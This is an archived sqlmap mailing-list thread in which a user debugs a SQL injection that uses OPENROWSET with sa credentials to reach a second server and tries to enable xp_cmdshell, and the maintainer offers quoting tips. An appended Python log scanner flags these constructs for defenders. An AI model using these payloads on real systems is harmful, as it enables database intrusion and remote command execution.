-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  ( 
select * from 
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
  select @@version;  master..sp_configure ''xp_cmdshell'',1  
')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808


the problem is with the query:

select @@version;  master..sp_configure ''xp_cmdshell'',1

Any possibility to give the string from ascii codes as in mysql? 


________________________________
 From: Miroslav Stampar <miroslav.stam...@gmail.com>
To: Adi Mutu <adi_mut...@yahoo.com> 
Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net> 
Sent: Thursday, June 21, 2012 2:01 PM
Subject: Re: [sqlmap-users] error with ms sql
 

It all depends on context. You'll need to send a sample that you want to run. 
Quotes are not interpreted/parsed everywhere the same.

Kind regards



On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:

>My feeling is that
>"[OLE/DB provider returned message: Deferred prepare could not be completed." 
>is because of an SQL error :) so my fault.
>
>
>
>And regarding the second error, I think you must always return some columns in 
>the query, such as select @@version.
>
>
>Now the question is: how do I embed a string inside another string delimited with 
>quotes? Looks like double quotes are not working..... doubling the quote '' looks 
>like it is not always working....
>
>
>
>________________________________
> From: Adi Mutu <adi_mut...@yahoo.com>
>To: Miroslav Stampar <miroslav.stam...@gmail.com> 
>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net> 
>Sent: Thursday, June 21, 2012 11:45 AM
>Subject: Re: [sqlmap-users] error with ms sql
> 
>
>tried, same stuff.
>I've tried to reenable xp_cmdshell first with
>
>
>master..sp_configure 'show advanced options',1 
>reconfigure 
>master..sp_configure 'xp_cmdshell',1 
>reconfigure 
>
>
>and got the same error: [OLE/DB provider returned message: Deferred prepare 
>could not be completed.]
>
>
>then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
>and got error:
>
>
>OLE DB error trace [Non-interface error:  
>OLE DB provider unable to process object, since the object has no 
>columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc 
>"xp_cmdshell","xp_log70.dll" '].
>
>
>
>
>
>
>________________________________
> From: Miroslav Stampar <miroslav.stam...@gmail.com>
>To: Adi Mutu <adi_mut...@yahoo.com> 
>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net> 
>Sent: Thursday, June 21, 2012 11:26 AM
>Subject: Re: [sqlmap-users] error with ms sql
> 
>
>try with master..resultabcd
>
>
>I forgot to mention that there needs to be two dots (or schema name in 
>between) between db name and table name in mssql
>
>
>On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
>Hi Miroslav,
>>
>>
>>Got db_name master and tried with master.resultabcd but I get the same error.
>>
>>
>>Kind Regards,
>>A.
>>
>>
>>
>>________________________________
>> From: Miroslav Stampar <miroslav.stam...@gmail.com>
>>To: Adi Mutu <adi_mut...@yahoo.com> 
>>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net> 
>>Sent: Thursday, June 21, 2012 11:11 AM
>>Subject: Re: [sqlmap-users] error with ms sql
>> 
>>
>>
>>Hi Adi.
>>
>>
>>You could try prepending the database name to the resultbcd. It seems that in 
>>case of linked server(s) doing that fixes the mentioned problem (Reference: 
>>http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)
>>
>>
>>Kind regards,
>>Miroslav Stampar
>>
>>
>>On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>>
>>I'm having an injection like this:
>>>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>>>
>>>
>>>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  ( 
>>>select * from 
>>>OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
>>> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from 
>>>teachers7 where id=808
>>>
>>>
>>>
>>>and when I try to select from resultabcd I get:
>>>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>>>
>>>
>>>
>>>could not find a good answer with google. Thanks.
>>>
>>>
>>>Kind regards,
>>>A.
>>>------------------------------------------------------------------------------
>>>Live Security Virtual Conference
>>>Exclusive live event will cover all the ways today's security and
>>>threat landscape has changed and how IT managers can respond. Discussions
>>>will include endpoint security, mobile security and the latest in malware
>>>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>_______________________________________________
>>>sqlmap-users mailing list
>>>sqlmap-users@lists.sourceforge.net
>>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>>-- 
>>Miroslav Stampar
>>http://about.me/stamparm
>>
>>
>>
>
>
>
>-- 
>Miroslav Stampar
>http://about.me/stamparm
>
>
>
>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
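
Added example (not part of the original thread and not sqlmap code): a defender-side check that flags the constructs seen in this thread, OPENROWSET with inline credentials and attempts to re-enable xp_cmdshell, in URL-encoded web request logs. The log lines, addresses, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules derived from the constructs quoted in the thread (names are hypothetical).
RULES = {
    "openrowset_adhoc": re.compile(r"\bopenrowset\s*\(", re.I),
    "inline_db_credentials": re.compile(r"\buid\s*=[^;']*;\s*pwd\s*=", re.I),
    "sp_configure_call": re.compile(r"\bsp_configure\b", re.I),
    "xp_cmdshell_reference": re.compile(r"\bxp_cmdshell\b", re.I),
    "sp_addextendedproc_call": re.compile(r"\bsp_addextendedproc\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Constructed sample log (documentation addresses, password redacted).
SAMPLE_LOG = [
    '192.0.2.7 - - [21/Jun/2012:10:01:00 +0000] "GET /teachers.asp?id=808 HTTP/1.1" 200 5120',
    '192.0.2.9 - - [21/Jun/2012:10:01:07 +0000] "GET /teachers.asp?id=-1+union+all+select+'
    '%271%27%2C%28select+*+from+OPENROWSET%28%27SQLOLEDB%27%2C%27uid%3Dsa%3Bpwd%3DREDACTED'
    '%3BAddress%3D192.0.2.10%27%2C%27select+%40%40version%27%29%29 HTTP/1.1" 500 312',
    '192.0.2.9 - - [21/Jun/2012:10:02:11 +0000] "GET /teachers.asp?q=select+%40%40version'
    '%3B+master..sp_configure+%27%27xp_cmdshell%27%27%2C1 HTTP/1.1" 500 298',
    '192.0.2.9 - - [21/Jun/2012:10:03:40 +0000] "GET /teachers.asp?q=exec+sp_addextendedproc'
    '+%22xp_cmdshell%22%2C%22xp_log70.dll%22 HTTP/1.1" 500 301',
]

def normalize(raw):
    """URL-decode up to three times (double encoding), drop /* */ comments,
    and collapse whitespace so the rules see one canonical form."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def scan_line(line):
    """Return the sorted names of all rules that match one log line."""
    norm = normalize(line)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan_log(lines):
    """Map 1-based line number -> rule hits, for lines with at least one hit."""
    hits = {n: scan_line(l) for n, l in enumerate(lines, start=1)}
    return {n: h for n, h in hits.items() if h}

if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG).items():
        print(lineno, ", ".join(names))
```

A hit on `openrowset_adhoc` together with `inline_db_credentials` is worth alerting on by itself, since application traffic rarely has a reason to carry connection strings in request parameters.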